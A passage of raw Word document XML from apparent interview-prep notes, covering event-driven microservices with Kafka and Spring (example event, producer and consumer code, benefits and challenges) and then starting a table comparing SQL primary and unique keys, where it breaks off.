        <w:t xml:space="preserve"> listens for OrderCreated → Reserves stock → Publishes InventoryReserved event.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EC9727"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Payment Service</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> listens → Tries to deduct money → Publishes PaymentSuccess or PaymentFailed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6F9865"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Notification Service</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> listens to all events and sends email/SMS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703643BD" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔧</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Technology Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD19CD3"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Broker</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Apache Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407A2B89"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Spring Cloud Stream</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E4FB5E"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Message format</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: JSON with event types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508BFB65" w14:textId="77777777" w:rsidR="00F25965"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0D381E30">
          <v:rect id="_x0000_i2925" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="25383F04" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>📦</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Example Event:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D63073"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290DAE3B"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 xml:space="preserve">  "eventType": "OrderCreated",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE1CA0E"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 xml:space="preserve">  "orderId": "12345",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D112C8A"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 xml:space="preserve">  "userId": "u789",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E67F7A"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 xml:space="preserve">  "items": [ { "productId": "p1", "qty": 2 } ],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B540E3"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 xml:space="preserve">  "timestamp": "2025-04-20T10:30:00Z"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B872EF1"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C208B5F" w14:textId="77777777" w:rsidR="00F25965"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3CEADB8C">
          <v:rect id="_x0000_i2926" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="678FA1B6" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>💻</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Code Snippet: (Spring Boot + Kafka)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3BBA08" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Producer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5C827F"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0727D0"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private KafkaTemplate&lt;String, OrderEvent&gt; kafkaTemplate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8F430E" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="360C70E3"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public void publishOrderEvent(OrderEvent event) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16539799"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 xml:space="preserve">    kafkaTemplate.send("order-events", event);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEB87F9"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CC288F" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Consumer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183CCC45"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KafkaListener(topics = "order-events", groupId = "inventory-group")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F753021"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public void consumeOrderEvent(OrderEvent event) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC4639C"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 xml:space="preserve">    // process inventory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722E612A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78526E15" w14:textId="77777777" w:rsidR="00F25965"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18F567F9">
          <v:rect id="_x0000_i2927" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D561624" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9C15F5"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Decoupled services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1103184C"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Scalable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC7C93E"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Resilient to service failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11801AC1"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Easy to extend (plug new consumers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8F1FAC" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00000000" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="19A27455">
          <v:rect id="_x0000_i2928" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBF0736" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>⚠️</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Challenges:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E849B07"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Eventual consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003C316A"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Debugging &amp; tracing across async boundaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20406921"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t>Message duplication or ordering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620DE49D" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Schema evolution/versioning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351EA39E" w14:textId="4F746DC0" w:rsidR="00115965" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00115965">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="7377A150">
          <v:rect id="_x0000_i2929" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6169B238" w14:textId="292C4461" w:rsidR="006C0B8D" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0B8D" w:rsidP="001659D4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D466A04" w14:textId="77777777" w:rsidR="00AF4871" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF4871" w:rsidP="001659D4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A02EDAA" w14:textId="77777777" w:rsidR="00AF4871" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF4871" w:rsidP="001659D4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="445AB5A6" w14:textId="77777777" w:rsidR="00AF4871" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF4871" w:rsidP="001659D4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75595BFE" w14:textId="77777777" w:rsidR="00AF4871" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF4871" w:rsidP="001659D4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20935527" w14:textId="77777777" w:rsidR="007A79BD" w:rsidRPr="00CE4B95" w:rsidRDefault="007A79BD">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA18B5B" w14:textId="162EE852" w:rsidR="006C0B8D" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0B8D" w:rsidP="006C0B8D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="696" w:name="_Toc196308176"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SQL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="696"/>
    </w:p>
    <w:p w14:paraId="1E017D53" w14:textId="77777777" w:rsidR="003C0862" w:rsidRPr="00CE4B95" w:rsidRDefault="003C0862">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BB3F367" w14:textId="20BD80AB" w:rsidR="007A79BD" w:rsidRPr="00CE4B95" w:rsidRDefault="007A79BD" w:rsidP="007A79BD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="697" w:name="_Toc196308177"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Primary Key and Unique key?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="697"/>
    </w:p>
    <w:p w14:paraId="65AC17C7" w14:textId="08834F13" w:rsidR="00F45251" w:rsidRPr="00393B05" w:rsidRDefault="00F45251" w:rsidP="00302F91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Difference Between Primary Key and Unique Ke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6"/>
        <w:gridCol w:w="5425"/>
        <w:gridCol w:w="3233"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="4067556C" w14:textId="77777777" w:rsidTr="00F45251">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1619210F" w14:textId="77777777" w:rsidR="00F45251" w:rsidRPr="00393B05" w:rsidRDefault="00F45251" w:rsidP="00F45251">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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D160846" w14:textId="77777777" w:rsidR="00F45251" w:rsidRPr="00393B05" w:rsidRDefault="00F45251" w:rsidP="00F45251">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Primary Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31485EBD" w14:textId="77777777" w:rsidR="00F45251" w:rsidRPr="00393B05" w:rsidRDefault="00F45251" w:rsidP="00F45251">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Unique Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="5960F896" w14:textId="77777777" w:rsidTr="00F45251">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5744E521"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Uniqueness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0916F51D"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Ensures all values in the column are </w:t>
            </w:r>
            <w:r w:rsidRPr="00393B05">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>unique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50C61002"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Also ensures values are </w:t>
            </w:r>
            <w:r w:rsidRPr="00393B05">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>unique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="0148A90B" w14:textId="77777777" w:rsidTr="00F45251">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="782D86DA"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Null Values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="059B5CC6"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Cannot be null</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3442C9E8"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Can contain one null value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="4EFD365F" w14:textId="77777777" w:rsidTr="00F45251">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B89C3B7"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Number Allowed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
